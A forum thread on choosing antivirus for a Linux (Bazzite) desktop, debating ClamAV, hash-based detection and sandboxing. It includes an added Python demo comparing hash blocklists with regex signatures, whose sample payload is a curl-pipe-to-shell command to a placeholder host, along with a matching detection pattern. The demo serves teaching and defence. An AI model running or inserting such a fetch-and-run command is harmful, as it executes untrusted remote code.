I’m about to install bazzite on my wife’s older (2017) Windows 10 machine, and I’ve been going over how to recreate everything she currently has. Most programs (even proprietary ones) are not an issue, but I’m not finding much in the antivirus department.
I never even thought to install one on my Linux machine (also on bazzite, but I have used other distros in the past). So although I am no stranger to Linux, this issue blindsided me.
I know clamav exists, and I’m educating myself on how to use it, but a GUI would be nice for the wife. She’s not afraid of the terminal, but she likes the convenience of GUI programs.
Any suggestions? What do you use? Or is it just generally accepted that one should be careful and keep things up-to-date and that’s enough?


To be more clear, antivirus programs in general are mostly scams because they are advertised to do much more than they are actually capable of (especially proprietary ones that act as spyware, such as Norton or Avast, which have been caught selling user data). Hash-based antivirus solutions (such as ClamAV) aren’t effective either because they rely on “badness enumeration”, in which you try to determine all the bad samples (through a sample list or lists) and alert on or delete them when detected. This isn’t a good solution because a threat actor only has to add, for example, a single whitespace character to the code and it will produce a wildly different hash (which has not been sampled before). Badness enumeration is a shit way to deal with real problems; much better is an allowlist approach, such as a permission system where you minimize the access given and only soften the security until the app runs.
TLDR: Antivirus bad at job of stopping malware, and sandboxed apps good for security of your device.
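The whitespace argument above is easy to demonstrate. The script below is an added illustration, not code from the original thread and not ClamAV's engine: it compares an exact-hash blocklist (the "badness enumeration" the post describes) with a simple byte-pattern signature. The "known bad" sample is a harmless constructed shell one-liner standing in for malware, the signature name `Example.Downloader` and the regex are made up for this example, and `hamming_bits` just counts how many digest bits change after inserting one extra space.

```python
"""
Added example: an exact-hash blocklist misses a trivially modified sample,
while a pattern signature written with flexible whitespace still matches.
The payload, hashes and signature are constructed for illustration only.
"""
import hashlib
import re
from typing import Optional

# Constructed "known bad" sample: a harmless script standing in for malware.
KNOWN_BAD = b"echo pwned; curl http://example.invalid/stage2 | sh\n"

# Hash blocklist ("badness enumeration"): only exact whole-file hashes.
HASH_BLOCKLIST = {hashlib.sha256(KNOWN_BAD).hexdigest()}

# Content signature (hypothetical name and pattern): \s+ / \s* make it
# tolerant of inserted spaces or tabs, so the whitespace trick does nothing.
SIGNATURES = {
    "Example.Downloader": re.compile(rb"curl\s+http://\S+\s*\|\s*sh"),
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_blocklist_hit(data: bytes) -> bool:
    """Exact-hash detection: flagged only if the whole file's hash is known."""
    return sha256_hex(data) in HASH_BLOCKLIST


def signature_hit(data: bytes) -> Optional[str]:
    """Pattern detection: return the signature name if any pattern matches."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(data):
            return name
    return None


def mutate_whitespace(data: bytes) -> bytes:
    """The attacker's trivial change: insert one extra space after 'curl'."""
    return data.replace(b"curl ", b"curl  ", 1)


def hamming_bits(a_hex: str, b_hex: str) -> int:
    """Number of differing bits between two hex digests (avalanche effect)."""
    return bin(int(a_hex, 16) ^ int(b_hex, 16)).count("1")


def compare(original: bytes, variant: bytes) -> dict:
    """Run both detection methods on the original and the mutated sample."""
    return {
        "hash_detects_original": hash_blocklist_hit(original),
        "hash_detects_variant": hash_blocklist_hit(variant),
        "sig_detects_original": signature_hit(original),
        "sig_detects_variant": signature_hit(variant),
        "differing_hash_bits": hamming_bits(sha256_hex(original),
                                            sha256_hex(variant)),
    }


if __name__ == "__main__":
    variant = mutate_whitespace(KNOWN_BAD)
    for key, value in compare(KNOWN_BAD, variant).items():
        print(f"{key}: {value}")
```

Running it shows the hash blocklist catching the original and missing the one-space variant, while the pattern signature catches both; roughly half of the 256 digest bits change from that single byte. This is the reason signature engines layer body patterns and heuristics on top of plain file hashes, and also why the thread's later point stands: pattern signatures still only enumerate known badness, just at a coarser grain.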
I agree with your demonstration, but not the conclusion. The main threat in OP’s case is random attacks made by massive, standardized campaigns. So hashed signatures are better than nothing. Of course it is not enough for all kinds of attack, like a focused one.
I’m not sure where you get the idea that antivirus is mostly a scam. Yes, there are some questionable vendors out there, but it doesn’t mean it’s a scam. I know antivirus has saved my ass a couple of times, at least when I was younger. Was I doing something stupid? Yes. Do we all do something stupid every once in a while? Also yes.
ClamAV is purely hash-based, not heuristic? I knew it scored incredibly poorly in AV tests, which would make sense if that’s still their approach.
ClamAV has heuristic capabilities. Just search through the documentation and see how many switches contain ‘heuristic’:
https://docs.clamav.net/manual/Development/libclamav.html